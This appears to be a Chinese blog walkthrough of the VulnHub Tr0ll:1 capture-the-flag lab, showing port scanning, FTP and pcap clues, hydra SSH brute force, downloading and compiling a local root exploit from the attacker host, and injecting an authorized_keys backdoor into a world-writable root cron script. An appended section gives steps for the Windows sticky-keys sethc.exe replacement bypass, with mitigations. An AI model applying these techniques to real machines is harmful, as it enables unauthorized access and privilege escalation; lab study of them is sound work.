No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习
**
VulnHub-Tr0ll:1-Walkthrough
**
靶機地址:https://www.vulnhub.com/entry/tr0ll-1,100/
靶機難度:簡單(CTF)
靶機發布日期:2014年8月14日
靶機描述:Tr0ll的靈感來自OSCP實驗室中不斷搖曳的機器
目標:得到root權限&找到proof.txt
作者:大余
時間:2019-12-30
請注意:對于所有這些計算機,我已經使用VMware運行下載的計算機。我將使用Kali Linux作為解決該CTF的攻擊者機器。這里使用的技術僅用于學習教育目的,如果列出的技術用于其他任何目標,我概不負責。
一、信息收集
我們在VM中需要確定攻擊目標的IP地址,需要使用nmap獲取目標IP地址:
我們已經找到了此次CTF目標計算機IP地址:192.168.145.149
我們開始探索機器。第一步是找出目標計算機上可用的開放端口和一些服務
命令:nmap -sS -sV -T5 -A -p- 192.168.145.149
我們可以在上面看到Nmap找到開放的端口22、80,其中暴露的robots.txt和/ secret目錄,還有FTP帶有匿名登錄名:Anonymous FTP login allowed
遵循Nmap的線索,開始進行攻擊
登陸ftp,查看有啥有用信息,這里會用到FTP基礎知識
查看當前目錄,我們發現有一個名為lol.pcap的文件分析包,將文件下載到本地使用Wireshark打開查看(Wireshark需要必須掌握的知識,不會的趕緊腦補)
wireshark打開lol.pcap 發現提示:
FTP Data …secret_stuff.txt
FTP Data Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol Sucks, you were so close… gotta TRY HARDER!(硬生生給你們手打出來的…)
鑒于只發現了SSH/FTP/HTTP,英文說讓我使用root/sup3rs3cr3tdirlol登陸ssh 失敗告終!
我以為我輸入錯了,經過錯了幾次,發現是個坑…哎
跳過這個…繼續尋找信息
從web滲透試試
沒啥有用的信息,繼續瀏覽robots.txt
繼續瀏覽/secret
還是沒什么好的信息,由于前面wireshark打開lol.pcap發現的信息sup3rs3cr3tdirlol,我嘗試著打開目錄
這里我就試著打開,還真有信息…
下載roflmao文件并檢查其類型
它是32位ELF可執行文件,使用strings字符串對其執行一些靜態分析(前面章節有介紹)
進來看到笑臉…Find address 0x0856BF to proceed意思是找到地址0x0856BF
進入看看
發現有兩個文件夾:
good_luck(進入查看包含文件which_one_lol.txt)this_folder_contains_password(進入查看包含文件pass.txt)
這應該是用戶名,因為下面有個pass密碼…
只有一個密碼,將文件都下載下來…使用九頭蛇查看
命令:hydra -L which_one_lol.txt -p Pass.txt 192.168.145.149 ssh
login: overflow
password: Pass.txt
ssh登陸查看信息
靶機正在運行Ubuntu 14.04和3.13內核,看看是否可以找到這些版本的任何特權升級漏洞
二、提權
訪問exploit官網查看到可利用提權shell
在exploit官網查看可以使用37292進行提權(之前文章也遇到過使用37292提權)
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root 由于之前文章使用過我本地已經有shell了,然后使用python創建一個服務,通過服務上傳37292.c到靶機中
命令:python -m SimpleHTTPServer 5555
使用python獲得的shell權限后,得使用ptyhon獲得tty,使用
命令:python -c ‘import pty; pty.spawn("/bin/bash")’
命令:wget http://192.168.145.143:5555/37292.c
gcc 37292.c -o dayu
./dayu
獲得root權限,并查看proof.txt內容
三、提權方法
這臺靶機你們會遇到登陸ssh overflow@192.168.145.149后會2分鐘就自動斷開會話超時,然后得重新連接,這邊繼續講另外一種提權方法(我這邊回家操作了IP地址變動了)
會話自動斷開,原因可能是設置了計劃任務
查看日志/var/log/cronlog
繼續查看信息/lib/log/cleaner.py
cleaner.py腳本是以root權限執行的,并且該腳本是全局可寫的,那么我們就可以利用這一點進行提權
使用ssh-keygen(用來生成ssh公鑰認證所需的公鑰和私鑰文件)
目錄默認、密碼Pass.txt、反復輸入密碼即可在/root/.ssh/目錄生成id_rsa、 id_rsa.pub文件
將 id_rsa.pub產生的密匙內容復制到文本中
使用vim修改cleaner.py文件
命令:
#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub產生的密匙內容上圖有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()
這腳本提供給大家,收藏慢慢累積學習
出來后直接執行ssh root@192.168.182.143,然后輸入Pass.txt即可登錄
這邊的例子請用在正途!!后面還可以用反彈shell,或者自己寫木馬shell去提權,目前我還比較菜…在努力腦補!!
不缺乏更多的方式方法,方法知曉記得越來越多,網絡安全就會在你面前形同一張紙,你想進入就動動手指即可!!
此文章還未完…
由于我好朋友都和我說看不懂我的文章,我后期會陸陸續續分享一些生活中能簡單利用的windows漏洞!
此方法針對的是未打最新補丁的用戶(目前我身邊的人windows都有這個漏洞…看到的盡快打上補丁)
今天講解的是利用5次shift漏洞破解win7密碼(后續會介紹win10)
連續按5次shift如果出現了和上圖一樣的界面,就存在此可利用漏洞!!!
如果存在,右下角重新啟動電腦
然后在上圖“正在啟動Windows”界面強制關機,拔掉電源即可…!!!
在開機!!
開機后會出現**進入啟動啟動修復(推薦)**選項界面,選擇修復
修復會進入這個界面,千萬別點還原…點取消
點查看問題詳情
點擊erofflps.txt目錄
到C盤system32目錄下往下翻能看到藍色的圖標名稱:sethc
重命名文件改123(名稱隨意改)
繼續往下找到黑色圖標:CMD文件
復制一個cmd!!!
將復制的cmd副本改名
改成sethc
然后關掉記事本文件
完成重啟即可
到用戶密碼輸入界面連續按5次shift即可出現上圖,到了這兒下一步我就不教了,希望大家慎重!!
下面我教大家修復的辦法:
這方法只能緩解,有時候重啟電腦就不生效了,如果系統盤為NTFS文件系統,可以將sytem32下的sethc.exe文件設為everyone拒絕訪問,或者直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。
最有效的方法就是更新系統補丁至最新!!!!!
由于我們已經成功得到root權限&找到proof.txt,因此完成了CTF靶機,希望你們喜歡這臺機器,請繼續關注大余后期會有更多具有挑戰性的機器,一起練習學習。
如果你有其他的方法,歡迎留言。要是有寫錯了的地方,請你一定要告訴我。要是你覺得這篇博客寫的還不錯,歡迎分享給身邊的人。
總結
以上是生活随笔為你收集整理的No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 明日方舟骑兵与猎人活动良心来袭 叉叉助手
- 下一篇: P3041 [USACO12JAN]视频